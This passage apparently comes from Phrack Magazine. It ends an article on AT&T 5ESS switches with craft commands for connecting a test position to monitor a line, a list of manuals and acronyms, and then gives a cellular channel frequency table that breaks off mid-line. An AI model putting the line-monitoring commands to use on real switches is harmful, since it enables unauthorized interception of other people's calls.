CONN:WSLINE,TP=a,MLHG=x-y; x = MLHG number, y = MLHG member number To take set things back to normal and disconnect the BLV do a: DISC:WSPHONE,TP=z z = TP 1 through 8 NOTE: One may need to do a ALW:CALLMON before entering the CONN commands BIG NOTE: If you set your home telephone number as the test position, and you have only one phone line, you are stupid. Comments about the Underground ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There are a few people out there who have no idea what they are doing, and go on thinking they know it all (i.e. No Name Brand). It pisses me off when these people just go off and make shit up about things they have no idea what they are talking about. This file is to all the lazy people out there that just keep bitching and moaning about not knowing where to find information. Other Sources ~~~~~~~~~~~~~ Here is a list of Manuals that you can order from the CIC (1-800-432-6600). Note that some of these manuals are well over hundreds of dollars. Manual 234-105-110 System Maintenance Requirements and Tools Manual 235-001-001 Documentation Guide Manual 235-070-100 Switch Administration Guidelines Manual 235-100-125 System Description Manual 235-105-110 System Maintenance Requirements and Tools Manual 235-105-200 Precutover and Cutover Procedures Manual 235-105-210 Routine Operations and Maintenance Manual 235-105-220 Corrective Maintenance Manual 235-105-231 Hardware Change Procedures - Growth Manual 235-105-24x Generic Retrofit Procedures Manual 235-105-250 System Recovery Manual 235-105-250A Craft Terminal Lockout Job Aid Manual 235-105-331 Hardware Change Procedures - Degrowth Manual 235-105-44x Large Terminal Growth Procedures Manual 235-118-200 Recent Change Procedures Menu Mode Generic Program Manual 235-118-210 Recent Change Procedures Menu Mode Manual 235-118-213 Menu Mode 5E4 Software Release Manual 235-118-214 Batch Release 5E4 Software Release Manual 235-118-215 Text Interface 5E4 Software Release Manual 235-118-216 Recent Change Procedures Manual 235-118-217 Recent Change Procedures Batch Release 5E5 Software Release Manual 235-118-218 Recent Change Attribute Definitions 5E5 Software Release Manual 235-118-21x Recent Change Procedures - Menu Mode Manual 235-118-224 Recent Change Procedures 5E6 Software Release Manual 235-118-225 Recent Change Reference 5E6 Software Release Manual 235-118-240 Recent Change Procedures Manual 235-118-241 Recent Change Reference Manual 235-118-242 Recent Change Procedures 5E8 Software Release Manual 235-118-24x Recent Change Procedures Manual 235-118-311 Using RMAS 5E4 Software Release Manual 235-118-400 Office Records and Database Query 5E4 Software Release Manual 235-190-101 Business and Residence Modular Features ** Manual 235-190-105 ISDN Features and Applications Manual 235-190-115 Local and Toll System Features Manual 235-190-120 Common Channel Signaling Service Features Manual 235-190-130 Local Area Services Features Manual 235-190-300 Billing Features Manual 235-600-103 Translations Data Manual 235-600-30x ECD/SG Data Base Manual 235-600-400 Audits Manual 235-600-500 Assert Manual Manual 235-600-601 Processor Recovery Messages Manual 235-700-300 Peripheral Diagnostic Language Manual 235-900-101 Technical Specification and System Description Manual 235-900-103 Technical Specification Manual 235-900-104 Product Specification Manual 235-900-10x Product Specification Manual 235-900-301 ISDN Basic Rate Interface Specification Manual 250-505-100 OSPS Description and Procedures Manual 363-200-101 DCLU Integrated SLC Carrier System Manual TG-5 Translation Guide Practice 254-341-100 File System Software Subsystem Description 3B20D Computer Practice 254-301-110 Input-Output Processor Peripheral Controllers Description and Theory of Operation AT$T 3B20D Model 1 Computer None. Practice 254-341-220 3B20 System Diagnostic Software Subsystem Description 3B20D Processor CIC Select Code 303-001 Craft Interface User's Guide CIC Select Code 303-002 Diagnostics User's Guide CIC Select Code 303-006 AT$T AM UNIX RTR Operating System, System Audits Guide IM-5D000-01 Input Manual OM-5d000-01 Output Manual OPA-5P670-01 The Administrator User Guide OPA-5P672-01 The Operator User Guide OPA-5P674-01 The RMAS Generic - Provided User Masks Trademarks ~~~~~~~~~~ 5ESS - Registered trademark of AT$T. CLCI - Trademark of Bell Communications Research, Inc. CLLI - Trademark of Bell Communications Research, Inc. ESS - Trademark of AT$T. SLC - Registered trademark of AT$T. UNIX - Registered trademark of AT$T. DMERT - Registered trademark of AT$T. SCCS - Registered trademark of AT$T DMS - Registered trademark of Northern Telecom DEC - Registered trademark of Digital Equipment Corporation. VT100 - Trademark of Digital Equipment Corporation. Acronyms and Abbreviations ~~~~~~~~~~~~~~~~~~~~~~~~~~ ADTS - Automatic Data Test System ALIT - Automatic Line Insulation Testing AMA - Automatic Message Accounting AP - Attached Processor (1AESS 3B20) ATICS - Automated Toll Integrity Checking System BLV - Busy Line Verification BMD - Batch Mode Display BMI - Batch Mode Input - TIMEREL and DEMAND BMR - Batch Mode Release BRCS - Business Residence Custom Service CAMA - Centralized Automatic Message Accounting CIC - Customer Information Center (AT$T) DAMT - Direct Access Mechanize Testing DLTU - Digital Line Trunk Unit DMERT - Duplex Multiple Environment Real Time DSU - Digital Service Unit DTAC - Digital Test Access Connector GRASP - Generic Access Package IOP - Input/Output Processor IPS - Integrated Provisioning System ISDN - Integrated Services Digital Network ITNO - Item Number LMOS - Loop Maintenance Operations System LU - Line Unit MCC - Master Control Center MLT-2 - Mechanized Loop Testing - The Second Generation of Equipment MML - Man Machine Language MSGNO - Message Number MSGS - Message Switch NCT - Network Control and Timing ODD - Office Dependent Data OE - Office Equipment ONI - Operator Number Identification ORDNO - Service Order Number OSPS - Operator Service Position System OSS - Operations Support System POVT - Provisioning On-site Verification Testing RC - Recent Change RC/V - Recent Change and Verify RDATE - Release Date (Update Database Date) RMAS - Remote Memory Administration RTIME - Release Time (Update Database Time) RTS - Remote Test Unit SARTS - Switched Access Remote Test System SCCS - Switching Control Center System SLC - Subicer Loop Carrier SM - Switching Module SMAS - Switched Maintenance Access System SMPU - Switch Module Processor Unit SONET - Synchronous Optical Network SPC - Stored Program Control STLWS - Supplementary Trunk and Line Work Station TFTP - Television Facility Test Position TIMEREL - Time Release TIRKS - Trunk Integrated Record Keeping System TMS - Time Multiplexed Switch TRCO - Trouble Reporting Control Office TSI - Time Slot Interchangers TSIU - Time Slot Interchange Unit TU - Trunk Unit VFY - Verify I give AT$T due credit for much of this file, for without them, it would not have been possible! ==Phrack Magazine== Volume Four, Issue Forty-Three, File 17 of 27 CELLULAR INFORMATION COMPILED BY MADJUS of N.O.D. {Thanks go out to Spy Ace & The Nobody} CELLULAR FREQUENCIES BY CELL BAND A Cell # 1 Transmit Receive -------------------------------------------------- Channel 1 (333) Tx 879.990 Rx 834.990 Channel 2 (312) Tx 879.360 Rx 834.360 Channel 3 (291) Tx 878.730 Rx 833.730 Channel 4 (270) Tx 878.100 Rx 833.100 Channel 5 (249) Tx 877.470 Rx 832.470 Channel 6 (228) Tx 876.840 Rx 831.840 Channel 7 (207) Tx 876.210 Rx 831.210 Channel 8 (186) Tx 875.580 Rx 830.580 Channel 9 (165) Tx 874.950 Rx 829.950 Channel 10 (144) Tx 874.320 Rx 829.320 Channel 11 (123) Tx 873.690 Rx 828.690 Channel 12 (102) Tx 873.060 Rx 828.060 Channel 13 (81) Tx 872.430 Rx 827.430 Channel 14 (60) Tx 871.800 Rx 826.800 Channel 15 (39) Tx 871.170 Rx 826.170 Channel 16 (18) Tx 870.540 Rx 825.540 Cell # 2 -------------------------------------------------- Channel 1 (332) Tx 879.960 Rx 834.960 Channel 2 (311) Tx 879.330 Rx 834.330 Channel 3 (290) Tx 878.700 Rx 833.700 Channel 4 (269) Tx 878.070 Rx 833.070 Channel 5 (248) Tx 877.440 Rx 832.440 Channel 6 (227) Tx 876.810 Rx 831.810 Channel 7 (206) Tx 876.180 Rx 831.180 Channel 8 (185) Tx 875.550 Rx 830.550 Channel 9 (164) Tx 874.920 Rx 829.920 Channel 10 (143) Tx 874.290 Rx 829.290 Channel 11 (122) Tx 873.660 Rx 828.660 Channel 12 (101) Tx 873.030 Rx 828.030 Channel 13 (80) Tx 872.400 Rx 827.400 Channel 14 (59) Tx 871.770 Rx 826.770 Channel 15 (38) Tx 871.140 Rx 826.140 Channel 16 (17) Tx 870.510 Rx 825.510 Cell # 3 -------------------------------------------------- Channel 1 (331) Tx 879.930 Rx 834.930 Channel 2 (310) Tx 879.300 Rx 834.300 Channel 3 (289) Tx 878.670 Rx 833.670 Channel 4 (268) Tx 878.040 Rx 833.040 Channel 5 (247) Tx 877.410 Rx 832.410 Channel 6 (226) Tx 876.780 Rx 831.780 Channel 7 (205) Tx 876.150 Rx 831.150 Channel 8 (184) Tx 875.520 Rx 830.520 Channel 9 (163) Tx 874.890 Rx 829.890 Channel 10 (142) Tx 874.260 Rx 829.260 Channel 11 (121) Tx 873.630 Rx 828.630 Channel 12 (100) Tx 873.000 Rx 828.000 Channel 13 (79) Tx 872.370 Rx 827.370 Channel 14 (58) Tx 871.740 Rx 826.740 Channel 15 (37) Tx 871.110 Rx 826.110 Channel 16 (16) Tx 870.480 Rx 825.480 Cell # 4 -------------------------------------------------- Channel 1 (330) Tx 879.900 Rx 834.900 Channel 2 (309) Tx 879.270 Rx 834.270 Channel 3 (288) Tx 878.640 Rx 833.640 Channel 4 (267) Tx 878.010 Rx 833.010 Channel 5 (246) Tx 877.380 Rx 832.380 Channel 6 (225) Tx 876.750 Rx 831.750 Channel 7 (204) Tx 876.120 Rx 831.120 Channel 8 (183) Tx 875.490 Rx 830.490 Channel 9 (162) Tx 874.860 Rx 829.860 Channel 10 (141) Tx 874.230 Rx 829.230 Channel 11 (120) Tx 873.600 Rx 828.600 Channel 12 (99) Tx 872.970 Rx 827.970 Channel 13 (78) Tx 872.340 Rx 827.340 Channel 14 (57) Tx 871.710 Rx 826.710 Channel 15 (36) Tx 871.080 Rx 826.080 Channel 16 (15) Tx 870.450 Rx 825.450 Cell # 5 -------------------------------------------------- Channel 1 (329) Tx 879.870 Rx 834.870 Channel 2 (308) Tx 879.240 Rx 834.240 Channel 3 (287) Tx 878.610 Rx 833.610 Channel 4 (266) Tx 877.980 Rx 832.980 Channel 5 (245) Tx 877.350 Rx 832.350 Channel 6 (224) Tx 876.720 Rx 831.720 Channel 7 (203) Tx 876.090 Rx 831.090 Channel 8 (182) Tx 875.460 Rx 830.460 Channel 9 (161) Tx 874.830 Rx 829.830 Channel 10 (140) Tx 874.200 Rx 829.200 Channel 11 (119) Tx 873.570 Rx 828.570 Channel 12 (98) Tx 872.940 Rx 827.940 Channel 13 (77) Tx 872.310 Rx 827.310 Channel 14 (56) Tx 871.680 Rx 826.680 Channel 15 (35) Tx 871.050 Rx 826.050 Channel 16 (14) Tx 870.420 Rx 825.420 Cell # 6 -------------------------------------------------- Channel 1 (328) Tx 879.840 Rx 834.840 Channel 2 (307) Tx 879.210 Rx 834.210 Channel 3 (286) Tx 878.580 Rx 833.580 Channel 4 (265) Tx 877.950 Rx 832.950 Channel 5 (244) Tx 877.320 Rx 832.320 Channel 6 (223) Tx 876.690 Rx 831.690 Channel 7 (202) Tx 876.060 Rx 831.060 Channel 8 (181) Tx 875.430 Rx 830.430 Channel 9 (160) Tx 874.800 Rx 829.800 Channel 10 (139) Tx 874.170 Rx 829.170 Channel 11 (118) Tx 873.540 Rx 828.540 Channel 12 (97) Tx 872.910 Rx 827.910 Channel 13 (76) Tx 872.280 Rx 827.280 Channel 14 (55) Tx 871.650 Rx 826.650 Channel 15 (34) Tx 871.020 Rx 826.020 Channel 16 (13) Tx 870.390 Rx 825.390 Cell # 7 -------------------------------------------------- Channel 1 (327) Tx 879.810 Rx 834.810 Channel 2 (306) Tx 879.180 Rx 834.180 Channel 3 (285) Tx 878.550 Rx 833.550 Channel 4 (264) Tx 877.920 Rx 832.920 Channel 5 (243) Tx 877.290 Rx 832.290 Channel 6 (222) Tx 876.660 Rx 831.660 Channel 7 (201) Tx 876.030 Rx 831.030 Channel 8 (180) Tx 875.400 Rx 830.400 Channel 9 (159) Tx 874.770 Rx 829.770 Channel 10 (138) Tx 874.140 Rx 829.140 Channel 11 (117) Tx 873.510 Rx 828.510 Channel 12 (96) Tx 872.880 Rx 827.880 Channel 13 (75) Tx 872.250 Rx 827.250 Channel 14 (54) Tx 871.620 Rx 826.620 Channel 15 (33) Tx 870.990 Rx 825.990 Channel 16 (12) Tx 870.360 Rx 825.360 Cell # 8 -------------------------------------------------- Channel 1 (326) Tx 879.780 Rx 834.780 Channel 2 (305) Tx 879.150 Rx 834.150 Channel 3 (284) Tx 878.520 Rx 833.520 Channel 4 (263) Tx 877.890 Rx 832.890 Channel 5 (242) Tx 877.260 Rx 832.260 Channel 6 (221) Tx 876.630 Rx 831.630 Channel 7 (200) Tx 876.000 Rx 831.000 Channel 8 (179) Tx 875.370 Rx 830.370 Channel 9 (158) Tx 874.740 Rx 829.740 Channel 10 (137) Tx 874.110 Rx 829.110 Channel 11 (116) Tx 873.480 Rx 828.480 Channel 12 (95) Tx 872.850 Rx 827.850 Channel 13 (74) Tx 872.220 Rx 827.220 Channel 14 (53) Tx 871.590 Rx 826.590 Channel 15 (32) Tx 870.960 Rx 825.960 Channel 16 (11) Tx 870.330 Rx 825.330 Cell # 9 -------------------------------------------------- Channel 1 (325) Tx 879.750 Rx 834.750 Channel 2 (304) Tx 879.120 Rx 834.120 Channel 3 (283) Tx 878.490 Rx 833.490 Channel 4 (262) Tx 877.860 Rx 832.860 Channel 5 (241) Tx 877.230 Rx 832.230 Channel 6 (220) Tx 876.600 Rx 831.600 Channel 7 (199) Tx 875.970 Rx 830.970 Channel 8 (178) Tx 875.340 Rx 830.340 Channel 9 (157) Tx 874.710 Rx 829.710 Channel 10 (136) Tx 874.080 Rx 829.080 Channel 11 (115) Tx 873.450 Rx 828.450 Channel 12 (94) Tx 872.820 Rx 827.820 Channel 13 (73) Tx 872.190 Rx 827.190 Channel 14 (52) Tx 871.560 Rx 826.560 Channel 15 (31) Tx 870.930 Rx 825.930 Channel 16 (10) Tx 870.300 Rx 825.300 Cell # 10 -------------------------------------------------- Channel 1 (324) Tx 879.720 Rx 834.720 Channel 2 (303) Tx 879.090 Rx 834.090 Channel 3 (282) Tx 878.460 Rx 833.460 Channel 4 (261) Tx 877.830 Rx 832.830 Channel 5 (240) Tx 877.200 Rx 832.200 Channel 6 (219) Tx 876.570 Rx 831.570 Channel 7 (198) Tx 875.940 Rx 830.940 Channel 8 (177) Tx 875.310 Rx 830.310 Channel 9 (156) Tx 874.680 Rx 829.680 Channel 10 (135) Tx 874.050 Rx 829.050 Channel 11 (114) Tx 873.420 Rx 828.420 Channel 12 (93) Tx 872.790 Rx 827.790 Channel 13 (72) Tx 872.160 Rx 827.160 Channel 14 (51) Tx 871.530 Rx 826.530 Channel 15 (30) Tx 870.900 Rx 825.900 Channel 16 (9) Tx 870.270 Rx 825.270 Cell # 11 -------------------------------------------------- Channel 1 (323) Tx 879.690 Rx 834.690 Channel 2 (302) Tx 879.060 Rx 834.060 Channel 3 (281) Tx 878.430 Rx 833.430 Channel 4 (260) Tx 877.800 Rx 832.800 Channel 5 (239) Tx 877.170 Rx 832.170 Channel 6 (218) Tx 876.540 Rx 831.540 Channel 7 (197) Tx 875.910 Rx 830.910 Channel 8 (176) Tx 875.280 Rx 830.280 Channel 9 (155) Tx 874.650 Rx 829.650 Channel 10 (134) Tx 874.020 Rx 829.020 Channel 11 (113) Tx 873.390 Rx 828.390 Channel 12 (92) Tx 872.760 Rx 827.760 Channel 13 (71) Tx 872.130 Rx 827.130 Channel 14 (50) Tx 871.500 Rx 826.500 Channel 15 (29) Tx 870.870 Rx 825.870 Channel 16 (8) Tx 870.240 Rx 825.240 Cell # 12 -------------------------------------------------- Channel 1 (322) Tx 879.660 Rx 834.660 Channel 2 (301) Tx 879.030 Rx 834.030 Channel 3 (280) Tx 878.400 Rx 833.400 Channel 4 (259) Tx 877.770 Rx 832.770 Channel 5 (238) Tx 877.140 Rx 832.140 Channel 6 (217) Tx 876.510 Rx 831.510 Channel 7 (196) Tx 875.880 Rx 830.880 Channel 8 (175) Tx 875.250 Rx 830.250 Channel 9 (154) Tx 874.620 Rx 829.620 Channel 10 (133) Tx 873.990 Rx 828.990 Channel 11 (112) Tx 873.360 Rx 828.360 Channel 12 (91) Tx 872.730 Rx 827.730 Channel 13 (70) Tx 872.100 Rx 827.100 Channel 14 (49) Tx 871.470 Rx 826.470 Channel 15 (28) Tx 870.840 Rx 825.840 Channel 16 (7) Tx 870.210 Rx 825.210 Cell # 13 -------------------------------------------------- Channel 1 (321) Tx 879.630 Rx 834.630 Channel 2 (300) Tx 879.000 Rx 834.000 Channel 3 (279) Tx 878.370 Rx 833.370 Channel 4 (258) Tx 877.740 Rx 832.740 Channel 5 (237) Tx 877.110 Rx 832.110 Channel 6 (216) Tx 876.480 Rx 831.480 Channel 7 (195) Tx 875.850 Rx 830.850 Channel 8 (174) Tx 875.220 Rx 830.220 Channel 9 (153) Tx 874.590 Rx 829.590 Channel 10 (132) Tx 873.960 Rx 828.960 Channel 11 (111) Tx 873.330 Rx 828.330 Channel 12 (90) Tx 872.700 Rx 827.700 Channel 13 (69) Tx 872.070 Rx 827.070 Channel 14 (48) Tx 871.440 Rx 826.440 Channel 15 (27) Tx 870.810 Rx 825.810 Channel 16 (6) Tx 870.180 Rx 825.180 Cell # 14 -------------------------------------------------- Channel 1 (320) Tx 879.600 Rx 834.600 Channel 2 (299) Tx 878.970 Rx 833.970 Channel 3 (278) Tx 878.340 Rx 833.340 Channel 4 (257) Tx 877.710 Rx 832.710 Channel 5 (236) Tx 877.080 Rx 832.080 Channel 6 (215) Tx 876.450 Rx 831.450 Channel 7 (194) Tx 875.820 Rx 830.820 Channel 8 (173) Tx 875.190 Rx 830.190 Channel 9 (152) Tx 874.560 Rx 829.560 Channel 10 (131) Tx 873.930 Rx 828.930 Channel 11 (110) Tx 873.300 Rx 828.300 Channel 12 (89) Tx 872.670 Rx 827.670 Channel 13 (68) Tx 872.040 Rx 827.040 Channel 14 (47) Tx 871.410 Rx 826.410 Channel 15 (26) Tx 870.780 Rx 825.780 Channel 16 (5) Tx 870.150 Rx 825.150 Cell # 15 -------------------------------------------------- Channel 1 (319) Tx 879.570 Rx 834.570 Channel 2 (298) Tx 878.940 Rx 833.940 Channel 3 (277) Tx 878.310 Rx 833.310 Channel 4 (256) Tx 877.680 Rx 832.680 Channel 5 (235) Tx 877.050 Rx 832.050 Channel 6 (214) Tx 876.420 Rx 831.420 Channel 7 (193) Tx 875.790 Rx 830.790 Channel 8 (172) Tx 875.160 Rx 830.160 Channel 9 (151) Tx 874.530 Rx 829.530 Channel 10 (130) Tx 873.900 Rx 828.900 Channel 11 (109) Tx 873.270 Rx 828.270 Channel 12 (88) Tx 872.640 Rx 827.640 Channel 13 (67) Tx 872.010 Rx 827.010 Channel 14 (46) Tx 871.380 Rx 826.380 Channel 15 (25) Tx 870.750 Rx 825.750 Channel 16 (4) Tx 870.120 Rx 825.120 Cell # 16 -------------------------------------------------- Channel 1 (318) Tx 879.540 Rx 834.540 Channel 2 (297) Tx 878.910 Rx 833.910 Channel 3 (276) Tx 878.280 Rx 833.280 Channel 4 (255) Tx 877.650 Rx 832.650 Channel 5 (234) Tx 877.020 Rx 832.020 Channel 6 (213) Tx 876.390 Rx 831.390 Channel 7 (192) Tx 875.760 Rx 830.760 Channel 8 (171) Tx 875.130 Rx 830.130 Channel 9 (150) Tx 874.500 Rx 829.500 Channel 10 (129) Tx 873.870 Rx 828.870 Channel 11 (108) Tx 873.240 Rx 828.240 Channel 12 (87) Tx 872.610 Rx 827.610 Channel 13 (66) Tx 871.980 Rx 826.980 Channel 14 (45) Tx 871.350 Rx 826.350 Channel 15 (24) Tx 870.720 Rx 825.720 Channel 16 (3) Tx 870.090 Rx 825.090 Cell # 17 -------------------------------------------------- Channel 1 (317) Tx 879.510 Rx 834.510 Channel 2 (296) Tx 878.880 Rx 833.880 Channel 3 (275) Tx 878.250 Rx 833.250 Channel 4 (254) Tx 877.620 Rx 832.620 Channel 5 (233) Tx 876.990 Rx 831.990 Channel 6 (212) Tx 876.360 Rx 831.360 Channel 7 (191) Tx 875.730 Rx 830.730 Channel 8 (170) Tx 875.100 Rx 830.100 Channel 9 (149) Tx 874.470 Rx 829.470 Channel 10 (128) Tx 873.840 Rx 828.840 Channel 11 (107) Tx 873.210 Rx 828.210 Channel 12 (86) Tx 872.580 Rx 827.580 Channel 13 (65) Tx 871.950 Rx 826.950 Channel 14 (44) Tx 871.320 Rx 826.320 Channel 15 (23) Tx 870.690 Rx 825.690 Channel 16 (2) Tx 870.060 Rx 825.060 Cell # 18 -------------------------------------------------- Channel 1 (316) Tx 879.480 Rx 834.480 Channel 2 (295) Tx 878.850 Rx 833.850 Channel 3 (274) Tx 878.220 Rx 833.220 Channel 4 (253) Tx 877.590 Rx 832.590 Channel 5 (232) Tx 876.960 Rx 831.960 Channel 6 (211) Tx 876.330 Rx 831.330 Channel 7 (190) Tx 875.700 Rx 830.700 Channel 8 (169) Tx 875.070 Rx 830.070 Channel 9 (148) Tx 874.440 Rx 829.440 Channel 10 (127) Tx 873.810 Rx 828.810 Channel 11 (106) Tx 873.180 Rx 828.180 Channel 12 (85) Tx 872.550 Rx 827.550 Channel 13 (64) Tx 871.920 Rx 826.920 Channel 14 (43) Tx 871.290 Rx 826.290 Channel 15 (22) Tx 870.660 Rx 825.660 Channel 16 (1) Tx 870.030 Rx 825.030 Cell # 19 -------------------------------------------------- Channel 1 (315) Tx 879.450 Rx 834.450 Channel 2 (294) Tx 878.820 Rx 833.820 Channel 3 (273) Tx 878.190 Rx 833.190 Channel 4 (252) Tx 877.560 Rx 832.560 Channel 5 (231) Tx 876.930 Rx 831.930 Channel 6 (210) Tx 876.300 Rx 831.300 Channel 7 (189) Tx 875.670 Rx 830.670 Channel 8 (168) Tx 875.040 Rx 830.040 Channel 9 (147) Tx 874.410 Rx 829.410 Channel 10 (126) Tx 873.780 Rx 828.780 Channel 11 (105) Tx 873.150 Rx 828.150 Channel 12 (84) Tx 872.520 Rx 827.520 Channel 13 (63) Tx 871.890 Rx 826.890 Channel 14 (42) Tx 871.260 Rx 826.260 Channel 15 (21) Tx 870.630 Rx 825.630 Cell # 20 -------------------------------------------------- Channel 1 (314) Tx 879.420 Rx 834.420 Channel 2 (293) Tx 878.790 Rx 833.790 Channel 3 (272) Tx 878.160 Rx 833.160 Channel 4 (251) Tx 877.530 Rx 832.530 Channel 5 (230) Tx 876.900 Rx 831.900 Channel 6 (209) Tx 876.270 Rx 831.270 Channel 7 (188) Tx 875.640 Rx 830.640 Channel 8 (167) Tx 875.010 Rx 830.010 Channel 9 (146) Tx 874.380 Rx 829.380 Channel 10 (125) Tx 873.750 Rx 828.750 Channel 11 (104) Tx 873.120 Rx 828.120 Channel 12 (83) Tx 872.490 Rx 827.490 Channel 13 (62) Tx 871.860 Rx 826.860 Channel 14 (41) Tx 871.230 Rx 826.230 Channel 15 (20) Tx 870.600 Rx 825.600 Cell # 21 -------------------------------------------------- Channel 1 (313) Tx 879.390 Rx 834.390 Channel 2 (292) Tx 878.760 Rx 833.760 Channel 3 (271) Tx 878.130 Rx 833.130 Channel 4 (250) Tx 877.500 Rx 832.500 Channel 5 (229) Tx 876.870 Rx 831.870 Channel 6 (208) Tx 876.240 Rx 831.240 Channel 7 (187) Tx 875.610 Rx 830.610 Channel 8 (166) Tx 874.980 Rx 829.980 Channel 9 (145) Tx 874.350 Rx 829.350 Channel 10 (124) Tx 873.720 Rx 828.720 Channel 11 (103) Tx 873.090 Rx 828.090 Channel 12 (82) Tx 872.460 Rx 827.460 Channel 13 (61) Tx 871.830 Rx 826.830 Channel 14 (40) Tx 871.200 Rx 826.200 Channel 15 (19) Tx 870.570 Rx 825.570 ************************************************** BAND B Cell # 1 -------------------------------------------------- Channel 1 (334) Tx 880.020 Rx 835.020 Channel 2 (355) Tx 880.650 Rx 835.650 Channel 3 (376) Tx 881.280 Rx 836.280 Channel 4 (397) Tx 881.910 Rx 836.910 Channel 5 (418) Tx 882.540 Rx 837.540 Channel 6 (439) Tx 883.170 Rx 838.170 Channel 7 (460) Tx 883.800 Rx 838.800 Channel 8 (481) Tx 884.430 Rx 839.430 Channel 9 (502) Tx 885.060 Rx 840.060 Channel 10 (523) Tx 885.690 Rx 840.690 Channel 11 (544) Tx 886.320 Rx 841.320 Channel 12 (565) Tx 886.950 Rx 841.950 Channel 13 (586) Tx 887.580 Rx 842.580 Channel 14 (607) Tx 888.210 Rx 843.210 Channel 15 (628) Tx 888.840 Rx 843.840 Channel 16 (649) Tx 889.470 Rx 844.470 Cell # 2 -------------------------------------------------- Channel 1 (335) Tx 880.050 Rx 835.050 Channel 2 (356) Tx 880.680 Rx 835.680 Channel 3 (377) Tx 881.310 Rx 836.310 Channel 4 (398) Tx 881.940 Rx 836.940 Channel 5 (419) Tx 882.570 Rx 837.570 Channel 6 (440) Tx 883.200 Rx 838.200 Channel 7 (461) Tx 883.830 Rx 838.830 Channel 8 (482) Tx 884.460 Rx 839.460 Channel 9 (503) Tx 885.090 Rx 840.090 Channel 10 (524) Tx 885.720 Rx 840.720 Channel 11 (545) Tx 886.350 Rx 841.350 Channel 12 (566) Tx 886.980 Rx 841.980 Channel 13 (587) Tx 887.610 Rx 842.610 Channel 14 (608) Tx 888.240 Rx 843.240 Channel 15 (629) Tx 888.870 Rx 843.870 Channel 16 (650) Tx 889.500 Rx 844.500 Cell # 3 -------------------------------------------------- Channel 1 (336) Tx 880.080 Rx 835.080 Channel 2 (357) Tx 880.710 Rx 835.710 Channel 3 (378) Tx 881.340 Rx 836.340 Channel 4 (399) Tx 881.970 Rx 836.970 Channel 5 (420) Tx 882.600 Rx 837.600 Channel 6 (441) Tx 883.230 Rx 838.230 Channel 7 (462) Tx 883.860 Rx 838.860 Channel 8 (483) Tx 884.490 Rx 839.490 Channel 9 (504) Tx 885.120 Rx 840.120 Channel 10 (525) Tx 885.750 Rx 840.750 Channel 11 (546) Tx 886.380 Rx 841.380 Channel 12 (567) Tx 887.010 Rx 842.010 Channel 13 (588) Tx 887.640 Rx 842.640 Channel 14 (609) Tx 888.270 Rx 843.270 Channel 15 (630) Tx 888.900 Rx 843.900 Channel 16 (651) Tx 889.530 Rx 844.530 Cell # 4 -------------------------------------------------- Channel 1 (337) Tx 880.110 Rx 835.110 Channel 2 (358) Tx 880.740 Rx 835.740 Channel 3 (379) Tx 881.370 Rx 836.370 Channel 4 (400) Tx 882.000 Rx 837.000 Channel 5 (421) Tx 882.630 Rx 837.630 Channel 6 (442) Tx 883.260 Rx 838.260 Channel 7 (463) Tx 883.890 Rx 838.890 Channel 8 (484) Tx 884.520 Rx 839.520 Channel 9 (505) Tx 885.150 Rx 840.150 Channel 10 (526) Tx 885.780 Rx 840.780 Channel 11 (547) Tx 886.410 Rx 841.410 Channel 12 (568) Tx 887.040 Rx 842.040 Channel 13 (589) Tx 887.670 Rx 842.670 Channel 14 (610) Tx 888.300 Rx 843.300 Channel 15 (631) Tx 888.930 Rx 843.930 Channel 16 (652) Tx 889.560 Rx 844.560 Cell # 5 -------------------------------------------------- Channel 1 (338) Tx 880.140 Rx 835.140 Channel 2 (359) Tx 880.770 Rx 835.770 Channel 3 (380) Tx 881.400 Rx 836.400 Channel 4 (401) Tx 882.030 Rx 837.030 Channel 5 (422) Tx 882.660 Rx 837.660 Channel 6 (443) Tx 883.290 Rx 838.290 Channel 7 (464) Tx 883.920 Rx 838.920 Channel 8 (485) Tx 884.550 Rx 839.550 Channel 9 (506) Tx 885.180 Rx 840.180 Channel 10 (527) Tx 885.810 Rx 840.810 Channel 11 (548) Tx 886.440 Rx 841.440 Channel 12 (569) Tx 887.070 Rx 842.070 Channel 13 (590) Tx 887.700 Rx 842.700 Channel 14 (611) Tx 888.330 Rx 843.330 Channel 15 (632) Tx 888.960 Rx 843.960 Channel 16 (653) Tx 889.590 Rx 844.590 Cell # 6 -------------------------------------------------- Channel 1 (339) Tx 880.170 Rx 835.170 Channel 2 (360) Tx 880.800 Rx 835.800 Channel 3 (381) Tx 881.430 Rx 836.430 Channel 4 (402) Tx 882.060 Rx 837.060 Channel 5 (423) Tx 882.690 Rx 837.690 Channel 6 (444) Tx 883.320 Rx 838.320 Channel 7 (465) Tx 883.950 Rx 838.950 Channel 8 (486) Tx 884.580 Rx 839.580 Channel 9 (507) Tx 885.210 Rx 840.210 Channel 10 (528) Tx 885.840 Rx 840.840 Channel 11 (549) Tx 886.470 Rx 841.470 Channel 12 (570) Tx 887.100 Rx 842.100 Channel 13 (591) Tx 887.730 Rx 842.730 Channel 14 (612) Tx 888.360 Rx 843.360 Channel 15 (633) Tx 888.990 Rx 843.990 Channel 16 (654) Tx 889.620 Rx 844.620 Cell # 7 -------------------------------------------------- Channel 1 (340) Tx 880.200 Rx 835.200 Channel 2 (361) Tx 880.830 Rx 835.830 Channel 3 (382) Tx 881.460 Rx 836.460 Channel 4 (403) Tx 882.090 Rx 837.090 Channel 5 (424) Tx 882.720 Rx 837.720 Channel 6 (445) Tx 883.350 Rx 838.350 Channel 7 (466) Tx 883.980 Rx 838.980 Channel 8 (487) Tx 884.610 Rx 839.610 Channel 9 (508) Tx 885.240 Rx 840.240 Channel 10 (529) Tx 885.870 Rx 840.870 Channel 11 (550) Tx 886.500 Rx 841.500 Channel 12 (571) Tx 887.130 Rx 842.130 Channel 13 (592) Tx 887.760 Rx 842.760 Channel 14 (613) Tx 888.390 Rx 843.390 Channel 15 (634) Tx 889.020 Rx 844.020 Channel 16 (655) Tx 889.650 Rx 844.650 Cell # 8 -------------------------------------------------- Channel 1 (341) Tx 880.230 Rx 835.230 Channel 2 (362) Tx 880.860 Rx 835.860 Channel 3 (383) Tx 881.490 Rx 836.490 Channel 4 (404) Tx 882.120 Rx 837.120 Channel 5 (425) Tx 882.750 Rx 837.750 Channel 6 (446) Tx 883.380 Rx 838.380 Channel 7 (467) Tx 884.010 Rx 839.010 Channel 8 (488) Tx 884.640 Rx 839.640 Channel 9 (509) Tx 885.270 Rx 840.270 Channel 10 (530) Tx 885.900 Rx 840.900 Channel 11 (551) Tx 886.530 Rx 841.530 Channel 12 (572) Tx 887.160 Rx 842.160 Channel 13 (593) Tx 887.790 Rx 